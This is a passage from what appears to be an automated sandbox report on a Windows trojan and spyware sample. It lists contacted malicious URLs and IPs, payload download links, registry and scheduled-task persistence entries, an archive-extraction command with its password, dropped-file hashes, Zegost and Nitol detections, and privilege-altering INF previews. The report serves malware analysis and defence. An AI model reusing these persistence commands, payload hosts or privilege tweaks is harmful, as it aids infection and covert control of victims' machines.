http://crl.micro	powershell.exe, 00000012.00000002.2437259643.000000000064A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2557742454.0000000007BC0000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	irsetup.exe, 00000002.00000002.4541145532.00000000012EA000.00000004.00000010.00020000.00000000.sdmp	false
https://aka.ms/pscore6lB	powershell.exe, 00000012.00000002.2451042089.0000000004801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442792627.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2449266054.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2447234103.0000000005241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2611888707.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000C.00000002.2219260408.0000020BCE77C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2193866878.0000020BC00CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2219260408.0000020BCE8B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2520449271.0000000005868000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2507699467.000000000603F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2512297555.0000000005CE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2531110628.00000000062A9000.00000004.00000800.00020000.00000000.sdmp	false
http://%s/ip.txt	irsetup.exe, 00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp, iusb3mon.exe, iusb3mon.exe, 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, iusb3mon.exe, 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	false
http://go.microsoft.c	powershell.exe, 0000000C.00000002.2193060006.0000020BBCBB9000.00000004.00000020.00020000.00000000.sdmp	false
http://go.microsoft.ctain	powershell.exe, 0000000C.00000002.2193060006.0000020BBCBB9000.00000004.00000020.00020000.00000000.sdmp	false
https://xiaoma.s3.ap-east-1.amazonaws.com/iusb3mon.exe	irsetup.exe, 00000002.00000002.4545525629.0000000004500000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000003.2061142935.0000000006162000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4544865365.0000000003331000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4545525629.0000000004572000.00000004.00000020.00020000.00000000.sdmp	false
https://aka.ms/pscore68	powershell.exe, 0000000C.00000002.2193866878.0000020BBE701000.00000004.00000800.00020000.00000000.sdmp	false
https://ooddoo.top/abc/40.exe=	irsetup.exe, 00000002.00000002.4545525629.0000000004567000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000C.00000002.2193866878.0000020BBE701000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2451042089.0000000004801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2442792627.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2449266054.0000000004C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2447234103.0000000005241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2611888707.0000000004401000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.org	powershell.exe, 0000000C.00000002.2193866878.0000020BBFBB7000.00000004.00000800.00020000.00000000.sdmp	false
http://www.indigorose.com/route.php?pid=suf9buyd	Whyet-4.9.exe, 00000000.00000003.2054506802.0000000002AAE000.00000004.00000020.00020000.00000000.sdmp, irsetup.exe, 00000002.00000002.4547332364.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp, irsetup.exe, 00000002.00000000.2059096006.00007FF78401A000.00000002.00000001.01000000.00000005.sdmp	false
https://ooddoo.top/	irsetup.exe, 00000002.00000002.4542558430.0000000001626000.00000004.00000020.00020000.00000000.sdmp	false
https://ooddoo.top/abc/40.exev	irsetup.exe, 00000002.00000002.4545979900.00000000063A8000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.81.224	ooddoo.top	United States		13335	CLOUDFLARENETUS	true
118.107.45.13	huazai168.com	Singapore		64050	BCPL-SGBGPNETGlobalASNSG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582017
Start date and time:	2024-12-29 16:02:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	160
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Whyet-4.9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@243/103@2/3
EGA Information:	Successful, ratio: 42.9%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1532 because it is empty
Execution Graph export aborted for target powershell.exe, PID 320 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4956 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5456 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:03:26	API Interceptor	416x Sleep call for process: powershell.exe modified
10:03:52	API Interceptor	466939x Sleep call for process: LxN_oT.exe modified
10:03:56	API Interceptor	3x Sleep call for process: svchost.exe modified
10:04:06	API Interceptor	2977x Sleep call for process: iusb3mon.exe modified
16:03:55	Task Scheduler	Run new task: UserLoginStartupTask path: C:\ProgramData\program\iusb3mon.exe
16:03:59	Task Scheduler	Run new task: Windows Audio Endpoint Builder() path: C:\ProgramData\Data\un.exe s>x -o- -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\ /st
16:04:01	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:04:29	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:04:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe
16:05:17	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft C:\ProgramData\Program\iusb3mon.exe

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	15405152
Entropy (8bit):	7.9969741858269074
Encrypted:	true
SSDEEP:	393216:3Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpw:3Rh8B2vB2c+kZD
MD5:	E039E221B48FC7C02517D127E158B89F
SHA1:	79EED88061472AE590616556F31576CA13BFC7FB
SHA-256:	DC30E5DAB15392627D30A506F6304030C581FC00716703FC31ADD10FF263D70B
SHA-512:	87231C025BB94771E89A639C9CB1528763F096059F8806227B8AB45A8F1EA5CD3D94FDC91CB20DD140B91A14904653517F7B6673A142A864A58A2726D14AE4B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j..........R5............@..........................p............@..............................................................'...........................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata...@...P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

Download File

Process:	C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3810
Entropy (8bit):	3.5689360433547153
Encrypted:	false
SSDEEP:	96:tCnRigEptnknQGdinigV9ll7dHAmzFzJE+:WRGryQxnjrHy+
MD5:	69C282FDCD177C1AC4D6709EF841DA65
SHA1:	575CBAC132F5215C9446E6B440CA44A2082F0644
SHA-256:	943F169C31C319417E61586D8911057321DE04926E01E4CC3E6F57B3B032C28E
SHA-512:	6B686A5D6AABE4681C6E1C83D4F32BD55D9FA26FC25ED72ECD20676C6DD3BD49CEE4F1E5D1B25F2D3A90A994BE00BF3B1366075272D4C3EA16917806DBBE0EA7
Malicious:	true
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.2.7.<./.D.a.t.e.>..... . . . .<.A.u.t.h.o.r.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.A.u.t.h.o.r.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.S.t.a.r.t.B.o.u.n.d.a.r.y.>.2.0.2.2.-.1.0.-.2.4.T.0.3.:.3.1.:.0.0.<./.S.t.a.r.t.B.o.u.n.d.a.r.y.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.U.s.e.r.I.d.>.A.d.m.i.n.i.s.t.r.a.t.o.r.<./.U.s.e.r.I.d.>..... . . . . . .<.L.o.g.o.n.T.

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3588072191296206
Encrypted:	false
SSDEEP:	6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
MD5:	663C5D6018506231E334FB3EA962ED1C
SHA1:	539A4641CE92E57E4ADEE32750A817326E596D4C
SHA-256:	066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
SHA-512:	5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
Malicious:	false
Reputation:	unknown
Preview:	*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8337387619453317
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugf:gJjJGtpTq2yv1AuNZRY3diu8iBVqFx
MD5:	2ABF77483809F4599A64AF5AFB98F557
SHA1:	A7E5A723A5B426C7CCDB6EDF3DFA9D5DC0EFBA06
SHA-256:	A3509BCBAAF580DA20B6B207035C7BAED08FD5AFF2C8FC277F7FB84210335049
SHA-512:	466C5ED8B6A3A77109E703D8FF4A5FB91C0873C3BFCD7980440BA19283063B8267D6CB840B6C855F8059E2B167F0ACC3B6C5C72A2EAA9FFB994F5E60843D24FA
Malicious:	false
Reputation:	unknown
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x6dcd8bb2, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.658452183307316
Encrypted:	false
SSDEEP:	1536:xSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:xaza6xhzA2U8HDnAPZ4PZf9h/9h
MD5:	39F2789D42358CBFC9AC6FF4053753BD
SHA1:	60FF704CBD49588841362B4DBA5E8104EF0F3FC2
SHA-256:	547375E0CA12A94D23FC9CC2CD49C72F3F98AEEE27B764FAD438F4B7BB55EAB1
SHA-512:	24D648BE233B8AFC4809B5C7601E0753D97901EECB0A19D2063AC8453F0B68B0869E828841730E43822715BBF9DB98960805A7EFA0A1CEB74F9E6154232E90F9
Malicious:	false
Reputation:	unknown
Preview:	m..... ...............X\...;...{......................T.~..........\|..8....\|..h.\|..........\|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................?;.;.....\|....................=.....\|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07514030601531836
Encrypted:	false
SSDEEP:	3:itllllUetYeqaWpk2tlllrbZ0tllttllall58Kgvvl/QoeP/ll:i1llNz1Wh50/Az8KgR+t
MD5:	B855F7A4A0D494A434B17F8EC0265553
SHA1:	9E6B27267269DEFA53A170EEC94FB0E8EC9CE217
SHA-256:	308E7B2E30F1D4274E9323849573D990FC061D78C2DB3CB49D5D61C0909FE3F2
SHA-512:	308237CAAAE545CB068AB4F59EED38600C65F55C5257EF07EC9590BBEB2F386F0134A4A6FE53DF9C4C1EBF1591ABE2919221C22C024BA6F5C75C4A6B32D04E3C
Malicious:	false
Reputation:	unknown
Preview:	.........................................;...{..8....\|.......\|...............\|.......\|..I.Q......\|.....................=.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Program\ziliao.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	226751
Entropy (8bit):	6.266031345877556
Encrypted:	false
SSDEEP:	6144:x/x6F5WCmLGEOmC4v8Z0J+c4v8Z0J+iI8:x/xSWYEOL
MD5:	497BC4B17398D5AFC4622E66E623F533
SHA1:	68699B0FD00BF5E5A71CBB9CE6AFB158D6A492CD
SHA-256:	543C66B627F6B6380B0E6A4ACD1FDD523051FEE344DC059DED299F1CC2135B54
SHA-512:	2CE9930DBF17BE7DB460A145F13C82B9C5A40595FAFF95830880949492B22CB3010379DEF6A3AD3435DC712003004766BBEEB27FC383DD784CA5723C3151961C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: C:\ProgramData\Microsoft\Program\ziliao.jpg, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Reputation:	unknown
Preview:	....U....SV.q<W.U.D.x..tm.\|.\|.tf.\...]...t[.T...t. ..D.$..U...3.u..E..t:.<.3....}.....t...i..........C....u.].......;u.t..u.B;.r.3._^[..].}..u..E....P.U.......WQ.U...U..Q.e.......X-.....E..E...].U..QQd.0...SVW.@...P..A..r$3.z(...~.........ar......i.........Nu.....................u.3.j..T..........P.x. ..........3.b4.^.C........3.s.H..C........3...\p.C...........C..E..E.ntdlf.E.l.P.S..3...y....._....3......C....N...YY_^.C.[..].r..a...U......M..E.SV..u.3......MZ..f9.u.W.x<...?PE....s....L...f9G...d......f9G...W...j@h.....wP3.S.Q.......=....wT.E..u.V.P..~<3....]..}.f;G.sX.]......E..H...t+..8.t..0.@...P.E.Q.P.....8.v..w8.E.Q.P..E..M...(.E.A..G.;.M..E.\|.3........t`9.....tX..0.E.B..]...E...~1..TY....E..0..%....f;E.u...........+G4..2C;].\|.3.E....A....E.....u.........t.9.....tw...i..P.E..P..E...."....E.....u..H..P...M...U....t3.]...y.......F...P.u.........E.....E.....u.}.3.E.....E..@...u.........t?.L1.3.j.X+..M......]..E.E..t...Sj.V...M..E...@.M..E.;.u

C:\ProgramData\Program\iusb3mon.exe

Download File

Process:	C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3149120
Entropy (8bit):	7.833992786773433
Encrypted:	false
SSDEEP:	98304:pyKQ/NMgJsSGeMlV1ZSP3C62VEyp9oq5ek4APkPY:PZg+BUPSHvMq5AA8PY
MD5:	C4C5317AC1AB7077C53DB6D82B2A119F
SHA1:	10B6E3E3B522FF187F5F10BDDF9AC0A64B458C75
SHA-256:	06D09B5FEF7B03D9EF7BE2DEC60A4E31124616A7D22705273650D7D86C6C6365
SHA-512:	AB4346CA6E3F2C6B434C5E6E5F16B4FF2B8B08950D37F85E7FA79979E1FA7EDD5C14F11471EDF91AC4D51053E5C90054B2C56AD3DE163ED0E96FE93E8AB19E78
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.F...........@...........................m.......0...@.............................................h............./.@).......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .............n..............@..@ ,............N..............@..B.idata...............f..............@....rsrc................h..............@..@.winlice.@8..P......................`....boot.....&...F...&.................`..`........................................................................................................................

C:\ProgramData\mntemp

Download File

Process:	C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	4.0
Encrypted:	false
SSDEEP:	3:iyNn:jn
MD5:	C06F9C595BE11736FFF9424CA46B1FDB
SHA1:	47B5687A388F2BD24780BF94C44553D3C759ECAB
SHA-256:	C0E963F8EC4F101AF17CFCE293720B7C5CB2929CFCA3346AD17E99F59EDAA599
SHA-512:	F78A90D7C8F76534061D976FE14DA04C12C25B982545E5F3E4FC2A852EB72C4F9E56795C30FA1F10E09B3D95750277A66EE3A11F49F2210ED098A5C84E7F8192
Malicious:	false
Reputation:	unknown
Preview:	P.....z..:./..

C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3149120
Entropy (8bit):	7.833992786773433
Encrypted:	false
SSDEEP:	98304:pyKQ/NMgJsSGeMlV1ZSP3C62VEyp9oq5ek4APkPY:PZg+BUPSHvMq5AA8PY
MD5:	C4C5317AC1AB7077C53DB6D82B2A119F
SHA1:	10B6E3E3B522FF187F5F10BDDF9AC0A64B458C75
SHA-256:	06D09B5FEF7B03D9EF7BE2DEC60A4E31124616A7D22705273650D7D86C6C6365
SHA-512:	AB4346CA6E3F2C6B434C5E6E5F16B4FF2B8B08950D37F85E7FA79979E1FA7EDD5C14F11471EDF91AC4D51053E5C90054B2C56AD3DE163ED0E96FE93E8AB19E78
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?...{.u.{.u.{.u..v.v.u..p...u..q.m.u..q.j.u..v.o.u..s.z.u..p.(.u..t.v.u.{.t...u.Y.\|.z.u.Y...z.u.Y.w.z.u.Rich{.u.........................PE..L...b.Lg...............$............X.F...........@...........................m.......0...@.............................................h............./.@).......................................................................................... L........................... ..` .........b..................@..@ h............j..............@... .............n..............@..@ ,............N..............@..B.idata...............f..............@....rsrc................h..............@..@.winlice.@8..P......................`....boot.....&...F...&.................`..`........................................................................................................................

C:\Users\user\AppData\Local\.dat

Download File

Process:	C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	192
Entropy (8bit):	4.835316649520873
Encrypted:	false
SSDEEP:	3:rmgQABQtuUX849j17jDCXTXQtuUX4ir/h7jgQABQtuUX6h/t4r/r4n:xQAWtzp9jDtz4irmQAWtz6kr0n
MD5:	AA16695B9F1E77A106E5FE4FF7C67787
SHA1:	C8D186D38C942A747A5DA8CF026BCDE70ADFD5DC
SHA-256:	12E3AB7BAC194282BFDED9742DF98BED2CE1940F3B86D51607236B90B5684A5C
SHA-512:	19810FC8938BF181FE304E223D36BF022886FE50B07908F5195972A0DAA6FA0BF212BF6B99E1BBC71D605A7F3EB8A757188FD596A45DBA454F6B769F0A70DBC4
Malicious:	false
Reputation:	unknown
Preview:	......[....:]Run..[...:]2024-12-29 10:4:11..[....:]r[WIN]......[....:]Program Manager..[...:]2024-12-29 10:4:39..[....:][WIN]......[....:]Run..[...:]2024-12-29 10:6:40..[....:][WIN][WIN]

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	390
Entropy (8bit):	3.70121954190789
Encrypted:	false
SSDEEP:	12:Q+eSREiRFGjowZaDaK2YhvfqlbTb47ZkW:Q+eSREMAF42SiJP4lB
MD5:	B66F55531E3BC2059BC9DC2925BD022D
SHA1:	D2F77035A6CFFF4F3FCE7F08902B790623C5C48A
SHA-256:	1A19404888C3463A206AE85DA582A233E4FF74E5AFEA7FCE71D24E3F71F88B8C
SHA-512:	8FE726CACE14EEFEDEBA9E9367F9D415B631525BF4EC1DD43C0A91890EF92382C1D24631165566114468BF0C38999569C7D5BAA3089BE1606DC243D2116FC129
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.r.o.g.r.a.m.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Reputation:	unknown
Preview:	..

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	384
Entropy (8bit):	3.6991205247583334
Encrypted:	false
SSDEEP:	6:Q+qlf6Ahlc0oEiRHl89jowfxal6dtwalwN9+IlUSvfgDJrlbhEZUEn4lywCfHhkW:Q+eSREiRFGjowZaDaK2YhvfqlbEd7ZkW
MD5:	FA353436F217DA03FE4519A7E87768CC
SHA1:	766A1F589BABFD00B0CC0FEEDDB22E7DB408E975
SHA-256:	A0814A0E57FD427C73E0938D4B507EA43CDF1A720D27D36E5C7530099082E1CC
SHA-512:	43C3A23178A71B714FB9AEF57F8CB413C13E001DD28BD3DC0F23272F7FECEBB83E24892F0CF59331C1D6B111DCE7A91965793D2BE435939FAD72B184AFFB074F
Malicious:	false
Reputation:	unknown
Preview:	..[.U.n.i.c.o.d.e.].....U.n.i.c.o.d.e.=.y.e.s.....[.V.e.r.s.i.o.n.].....s.i.g.n.a.t.u.r.e.=.".$.C.H.I.C.A.G.O.$.".....R.e.v.i.s.i.o.n.=.1.....[.P.r.i.v.i.l.e.g.e. .R.i.g.h.t.s.].....S.e.D.e.b.u.g.P.r.i.v.i.l.e.g.e. .=. .*.S.-.1.-.5.-.1.8.....[.F.i.l.e. .S.e.c.u.r.i.t.y.].....".C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.D.a.t.a.".,.0.,.".D.:.A.R.(.D.;.O.I.C.I.;.D.T.S.D.R.C.W.D.;.;.;.W.D.).".....

C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log

Download File

Process:	C:\Windows\SysWOW64\SecEdit.exe
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
